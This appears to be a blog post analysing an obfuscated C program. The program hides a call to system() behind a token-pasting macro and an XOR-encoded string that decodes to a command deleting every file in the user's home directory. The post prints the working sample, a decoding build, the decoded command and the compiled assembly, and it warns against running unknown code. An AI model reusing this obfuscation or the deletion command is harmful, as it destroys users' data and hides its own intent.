This is a very interesting obfuscated C program: it runs code that will delete the files in your home directory, but you cannot tell that from the obfuscated strings in the code.
/*
 * Obfuscated sample from the post. Neither the library call nor its
 * argument appears as a literal: a token-pasting macro spells the callee's
 * name, and two byte tables are XOR-combined at run time into the string
 * that callee receives.
 */
#include <stdlib.h>
/*
 * Token-pasting macro. Only the 3rd, 5th, 6th, 7th and 8th parameters are
 * used (8th ## 3rd ## 8th ## 6th ## 5th ## 7th); the other three are
 * decoys. With the arguments given in main() it expands to the identifier
 * `system`, which is why <stdlib.h> is included.
 */
#define bf4217c1(e4973184, \
    fab74730, ea28c65d, e2c3d79f, \
    b61718db, bfd82916, ea98fe41, \
    a3e25fa) \
    a3e25fa ## ea28c65d ## a3e25fa \
    ## bfd82916 ## b61718db ## ea98fe41
/*
 * Ciphertext: 33 bytes and no terminating NUL. Values above 0x7f are
 * stored into a plain char, which is implementation-defined where char is
 * signed; the decode below only depends on the low 8 bits, so the result
 * is the same either way.
 */
char b4e0dee7[] = { 0x49, 0x5e, 0xce, 0x02, 0xb9, 0x6a, 0x1a, 0x1d, 0x0a, 0xaa, 0x1b, 0x5b, 0x52, 0x31, 0x07, 0xa3, 0xc5, 0x03, 0x9a, 0x2a, 0xff, 0xde, 0xaa, 0x68, 0xc0, 0x29, 0x5b, 0x1d, 0x9e, 0x51, 0x53, 0xca, 0x63 };
/* XOR key: 37 entries, of which only the first 33 are ever read. */
int bf29e96c[] = { 0x2f, 0x37, 0xa0, 0x66, 0x99, 0x14, 0x3a, 0x30, 0x7e, 0xd3, 0x6b, 0x3e, 0x72, 0x57, 0x27, 0x8e, 0xa0, 0x7b, 0xff, 0x49, 0xdf, 0xac, 0xc7, 0x48, 0xed, 0x5b, 0x3d, 0x3d, 0xe5, 0x2c, 0x73, 0x96, 0x58, 0x7b, 0x06, 0xef, 0xd6 };
int main(void)
{
    /*
     * In-place XOR decode of b4e0dee7 with bf29e96c. The arithmetic wrapped
     * around the XOR, 1 + ((-1 * v * -1) * 1) - 1, is an identity on v and
     * only exists to look complicated. `ca4f8421` is an int compared with
     * a size_t, so the comparison is performed unsigned (-Wsign-compare).
     */
    for (int ca4f8421=0; ca4f8421<sizeof(b4e0dee7); ++ca4f8421)
        b4e0dee7[ca4f8421] = 1 + ((-1 * (b4e0dee7[ca4f8421] ^ bf29e96c[ca4f8421]) * -1) * 1) - 1;
    /*
     * Expands to system(b4e0dee7): the decoded buffer is handed to the
     * shell. The array holds 33 decoded characters and no NUL, so reading
     * it as a C string runs off the end of the object; it only "works"
     * because the bytes the linker places after it happen to be zero
     * padding. That is an out-of-bounds read, not a terminator.
     */
    bf4217c1(z,x,y,j,e,t,m,s)(b4e0dee7);
    return 0;
}
This is pretty evil code. Do not run this on your machine.
If it is modified like this, we can see what it does.
/*
 * Analysis build of the sample: identical to the original except that the
 * macro-spelled library call is commented out and the decoded buffer is
 * printed instead, so the hidden command can be read without executing it.
 */
#include <stdlib.h>
#include <stdio.h>
/*
 * Token-pasting macro; with the arguments used below it expands to the
 * identifier `system`. Left in place so the listing stays comparable with
 * the original, although nothing calls it any more.
 */
#define bf4217c1(e4973184, \
    fab74730, ea28c65d, e2c3d79f, \
    b61718db, bfd82916, ea98fe41, \
    a3e25fa) \
    a3e25fa ## ea28c65d ## a3e25fa \
    ## bfd82916 ## b61718db ## ea98fe41
/* Ciphertext: 33 bytes, no terminating NUL (see the note at puts()). */
char b4e0dee7[] = { 0x49, 0x5e, 0xce, 0x02, 0xb9, 0x6a, 0x1a, 0x1d, 0x0a, 0xaa, 0x1b, 0x5b, 0x52, 0x31, 0x07, 0xa3, 0xc5, 0x03, 0x9a, 0x2a, 0xff, 0xde, 0xaa, 0x68, 0xc0, 0x29, 0x5b, 0x1d, 0x9e, 0x51, 0x53, 0xca, 0x63 };
/* XOR key: 37 entries, of which only the first 33 are read. */
int bf29e96c[] = { 0x2f, 0x37, 0xa0, 0x66, 0x99, 0x14, 0x3a, 0x30, 0x7e, 0xd3, 0x6b, 0x3e, 0x72, 0x57, 0x27, 0x8e, 0xa0, 0x7b, 0xff, 0x49, 0xdf, 0xac, 0xc7, 0x48, 0xed, 0x5b, 0x3d, 0x3d, 0xe5, 0x2c, 0x73, 0x96, 0x58, 0x7b, 0x06, 0xef, 0xd6 };
int main(void)
{
    /*
     * Byte-wise XOR decode; the surrounding arithmetic is an identity and
     * changes nothing. int-vs-size_t comparison, evaluated unsigned.
     */
    for (int ca4f8421=0; ca4f8421<sizeof(b4e0dee7); ++ca4f8421)
        b4e0dee7[ca4f8421] = 1 + ((-1 * (b4e0dee7[ca4f8421] ^ bf29e96c[ca4f8421]) * -1) * 1) - 1;
    /* Original call site, disabled: this line expanded to system(b4e0dee7). */
    //bf4217c1(z,x,y,j,e,t,m,s)(b4e0dee7);
    /*
     * Print the decoded command instead of running it. puts() still reads
     * past the 33-byte array looking for a NUL, so the output depends on
     * the bytes that follow it in memory being zero.
     */
    puts(b4e0dee7);
    return 0;
}
The #define directive defines a macro that uses token concatenation (##) to build a single token out of its arguments. Looking at bf4217c1(z,x,y,j,e,t,m,s), you can see that it evaluates to system. You can verify this by just running the preprocessor. The final value of b4e0dee7 is constructed by iterating over b4e0dee7 and bf29e96c and XOR-ing the elements pairwise (the arithmetic wrapped around the XOR is an identity and only adds noise). Simply print out its value to see that it evaluates to “find ~ -type f -exec rm -rf {} \;”. The “actual code” is therefore system(“find ~ -type f -exec rm -rf {} \;”);, which deletes all files in your home directory, provided you have find in PATH.
This is the output I got after modifying this program.
>-jason-Lenovo-H50-55@jason:_ -5.1-~/Documents-11:51-[$] ./test find ~ -type f -exec rm -rf {} \; |
So, this will delete all files in your home directory and ruin your day.
I ran gcc -S to get the compiler's assembly output and see what it does: it uses the system() function to run the malicious command instead of execve() or something better.
	# gcc -S output for the obfuscated sample. Symbol names match the C
	# source; the comments mark the data objects, the decode loop and the
	# library call that the macro obfuscation hid.
	.file	"obfucate.c"
	.text
	.globl	b4e0dee7
	.data
	.align 32
	.type	b4e0dee7, @object
	.size	b4e0dee7, 33
	# 33 bytes of ciphertext and no trailing NUL. The next object is
	# aligned to 32, so the bytes following this one are zero padding,
	# which is the only reason treating it as a C string later terminates.
b4e0dee7:
	.ascii	"I^\316\002\271j\032\035\n\252\033[R1\007\243\305\003\232*\377"
	.ascii	"\336\252h\300)[\035\236QS\312c"
	.globl	bf29e96c
	.align 32
	.type	bf29e96c, @object
	.size	bf29e96c, 148
	# XOR key: 37 x 4-byte ints (148 bytes); only the first 33 are read.
bf29e96c:
	.long	47
	.long	55
	.long	160
	.long	102
	.long	153
	.long	20
	.long	58
	.long	48
	.long	126
	.long	211
	.long	107
	.long	62
	.long	114
	.long	87
	.long	39
	.long	142
	.long	160
	.long	123
	.long	255
	.long	73
	.long	223
	.long	172
	.long	199
	.long	72
	.long	237
	.long	91
	.long	61
	.long	61
	.long	229
	.long	44
	.long	115
	.long	150
	.long	88
	.long	123
	.long	6
	.long	239
	.long	214
	.text
	.globl	main
	.type	main, @function
main:
.LFB6:
	.cfi_startproc
	endbr64
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6, -16
	movq	%rsp, %rbp
	.cfi_def_cfa_register 6
	subq	$16, %rsp
	# -4(%rbp) is the loop counter ca4f8421, initialised to 0.
	movl	$0, -4(%rbp)
	jmp	.L2
	# Loop body: b4e0dee7[i] = b4e0dee7[i] ^ bf29e96c[i]. The identity
	# arithmetic around the XOR in the source has been folded away; only
	# the xorl remains.
.L3:
	movl	-4(%rbp), %eax
	cltq
	leaq	b4e0dee7(%rip), %rdx
	movzbl	(%rax,%rdx), %ecx
	movl	-4(%rbp), %eax
	cltq
	leaq	0(,%rax,4), %rdx
	leaq	bf29e96c(%rip), %rax
	movl	(%rdx,%rax), %eax
	xorl	%eax, %ecx
	movl	-4(%rbp), %eax
	cltq
	leaq	b4e0dee7(%rip), %rdx
	movb	%cl, (%rax,%rdx)
	addl	$1, -4(%rbp)
	# Loop condition: i <= 32, compared unsigned (jbe) because the source
	# compares an int against sizeof(), i.e. a size_t. 33 iterations.
.L2:
	movl	-4(%rbp), %eax
	cmpl	$32, %eax
	jbe	.L3
	# system(b4e0dee7): the decoded buffer is passed to the shell. This is
	# the call the token-pasting macro obscured in the C source.
	leaq	b4e0dee7(%rip), %rax
	movq	%rax, %rdi
	call	system@PLT
	movl	$0, %eax
	leave
	.cfi_def_cfa 7, 8
	ret
	.cfi_endproc
.LFE6:
	.size	main, .-main
	.ident	"GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0"
	.section	.note.GNU-stack,"",@progbits
	# GNU property note (x86 feature bits, consistent with the endbr64 in
	# the prologue); toolchain boilerplate, not part of the sample's logic.
	.section	.note.gnu.property,"a"
	.align 8
	.long	1f - 0f
	.long	4f - 1f
	.long	5
0:
	.string	"GNU"
1:
	.align 8
	.long	0xc0000002
	.long	3f - 2f
2:
	.long	0x3
3:
	.align 8
4:
But this is a good lesson not to run any strange code you find on the Internet.